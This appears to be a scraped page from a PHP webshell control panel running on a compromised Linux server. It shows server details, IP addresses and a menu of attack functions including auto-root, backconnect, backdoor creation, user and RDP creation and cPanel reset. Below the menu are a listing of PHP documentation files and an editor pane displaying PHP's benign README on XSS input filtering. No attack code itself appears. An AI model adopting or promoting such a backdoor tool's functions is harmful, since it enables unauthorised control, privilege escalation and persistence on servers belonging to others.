Linux node5458.myfcloud.com 6.10.2-x86_64-linode165 #1 SMP PREEMPT_DYNAMIC Tue Jul 30 15:03:21 EDT 2024 x86_64
Apache
: 45.79.123.194 | : 18.226.98.128
16 Domain
7.4.33
addify5
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
alt-php73-common-7.3.33 /
[ HOME SHELL ]
Name
Size
Permission
Action
CODING_STANDARDS
12.43
KB
-rw-r--r--
CREDITS
93
B
-rw-r--r--
INSTALL
105
B
-rw-r--r--
LICENSE
3.13
KB
-rw-r--r--
NEWS
92.14
KB
-rw-r--r--
README.EXT_SKEL
1.35
KB
-rw-r--r--
README.GIT-RULES
5.16
KB
-rw-r--r--
README.MAILINGLIST_RULES
3.35
KB
-rw-r--r--
README.NEW-OUTPUT-API
5.05
KB
-rw-r--r--
README.PARAMETER_PARSING_API
7.64
KB
-rw-r--r--
README.REDIST.BINS
24.16
KB
-rw-r--r--
README.RELEASE_PROCESS
15.32
KB
-rw-r--r--
README.SELF-CONTAINED-EXTENSIO...
4.87
KB
-rw-r--r--
README.STREAMS
14.95
KB
-rw-r--r--
README.SUBMITTING_PATCH
7.93
KB
-rw-r--r--
README.TESTING
11.36
KB
-rw-r--r--
README.UNIX-BUILD-SYSTEM
4.16
KB
-rw-r--r--
README.WIN32-BUILD-SYSTEM
114
B
-rw-r--r--
README.input_filter
5.19
KB
-rw-r--r--
README.md
1.57
KB
-rw-r--r--
TSRM_LICENSE
1.28
KB
-rw-r--r--
ZEND_LICENSE
2.74
KB
-rw-r--r--
php.ini-development
69.7
KB
-rw-r--r--
php.ini-production
69.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.input_filter
Input Filter Support in PHP 5 ----------------------------- XSS (Cross Site Scripting) hacks are becoming more and more prevalent, and can be quite difficult to prevent. Whenever you accept user data and somehow display this data back to users, you are likely vulnerable to XSS hacks. The Input Filter support in PHP 5 is aimed at providing the framework through which a company-wide or site-wide security policy can be enforced. It is implemented as a SAPI hook and is called from the treat_data and post handler functions. To implement your own security policy you will need to write a standard PHP extension. There is also a powerful standard implementation in ext/filter that should suit most peoples' needs. However, if you want to implement your own security policy, read on. A simple implementation might look like the following. This stores the original raw user data and adds a my_get_raw() function while the normal $_POST, $_GET and $_COOKIE arrays are only populated with stripped data. In this simple example all I am doing is calling strip_tags() on the data. ZEND_BEGIN_MODULE_GLOBALS(my_input_filter) zval *post_array; zval *get_array; zval *cookie_array; ZEND_END_MODULE_GLOBALS(my_input_filter) #ifdef ZTS #define IF_G(v) TSRMG(my_input_filter_globals_id, zend_my_input_filter_globals *, v) #else #define IF_G(v) (my_input_filter_globals.v) #endif ZEND_DECLARE_MODULE_GLOBALS(my_input_filter) zend_function_entry my_input_filter_functions[] = { PHP_FE(my_get_raw, NULL) {NULL, NULL, NULL} }; zend_module_entry my_input_filter_module_entry = { STANDARD_MODULE_HEADER, "my_input_filter", my_input_filter_functions, PHP_MINIT(my_input_filter), PHP_MSHUTDOWN(my_input_filter), NULL, PHP_RSHUTDOWN(my_input_filter), PHP_MINFO(my_input_filter), "0.1", STANDARD_MODULE_PROPERTIES }; PHP_MINIT_FUNCTION(my_input_filter) { ZEND_INIT_MODULE_GLOBALS(my_input_filter, php_my_input_filter_init_globals, NULL); REGISTER_LONG_CONSTANT("POST", PARSE_POST, CONST_CS | CONST_PERSISTENT); REGISTER_LONG_CONSTANT("GET", PARSE_GET, CONST_CS | CONST_PERSISTENT); REGISTER_LONG_CONSTANT("COOKIE", PARSE_COOKIE, CONST_CS | CONST_PERSISTENT); sapi_register_input_filter(my_sapi_input_filter); return SUCCESS; } PHP_RSHUTDOWN_FUNCTION(my_input_filter) { if(IF_G(get_array)) { zval_ptr_dtor(&IF_G(get_array)); IF_G(get_array) = NULL; } if(IF_G(post_array)) { zval_ptr_dtor(&IF_G(post_array)); IF_G(post_array) = NULL; } if(IF_G(cookie_array)) { zval_ptr_dtor(&IF_G(cookie_array)); IF_G(cookie_array) = NULL; } return SUCCESS; } PHP_MINFO_FUNCTION(my_input_filter) { php_info_print_table_start(); php_info_print_table_row( 2, "My Input Filter Support", "enabled" ); php_info_print_table_end(); } /* The filter handler. If you return 1 from it, then PHP also registers the * (modified) variable. Returning 0 prevents PHP from registering the variable; * you can use this if your filter already registers the variable under a * different name, or if you just don't want the variable registered at all. */ SAPI_INPUT_FILTER_FUNC(my_sapi_input_filter) { zval new_var; zval *array_ptr = NULL; char *raw_var; int var_len; assert(*val != NULL); switch(arg) { case PARSE_GET: if(!IF_G(get_array)) { ALLOC_ZVAL(array_ptr); array_init(array_ptr); INIT_PZVAL(array_ptr); } IF_G(get_array) = array_ptr; break; case PARSE_POST: if(!IF_G(post_array)) { ALLOC_ZVAL(array_ptr); array_init(array_ptr); INIT_PZVAL(array_ptr); } IF_G(post_array) = array_ptr; break; case PARSE_COOKIE: if(!IF_G(cookie_array)) { ALLOC_ZVAL(array_ptr); array_init(array_ptr); INIT_PZVAL(array_ptr); } IF_G(cookie_array) = array_ptr; break; } Z_STRLEN(new_var) = val_len; Z_STRVAL(new_var) = estrndup(*val, val_len); Z_TYPE(new_var) = IS_STRING; var_len = strlen(var); raw_var = emalloc(var_len+5); /* RAW_ and a \0 */ strcpy(raw_var, "RAW_"); strlcat(raw_var,var,var_len+5); php_register_variable_ex(raw_var, &new_var, array_ptr); php_strip_tags(*val, val_len, NULL, NULL, 0); *new_val_len = strlen(*val); return 1; } PHP_FUNCTION(my_get_raw) { long arg; char *var; int var_len; zval **tmp; zval *array_ptr = NULL; if(zend_parse_parameters(2, "ls", &arg, &var, &var_len) == FAILURE) { return; } switch(arg) { case PARSE_GET: array_ptr = IF_G(get_array); break; case PARSE_POST: array_ptr = IF_G(post_array); break; case PARSE_COOKIE: array_ptr = IF_G(post_array); break; } if(!array_ptr) { RETURN_FALSE; } if(zend_hash_find(HASH_OF(array_ptr), var, var_len+5, (void **)&tmp) == SUCCESS) { *return_value = **tmp; zval_copy_ctor(return_value); } else { RETVAL_FALSE; } }
Close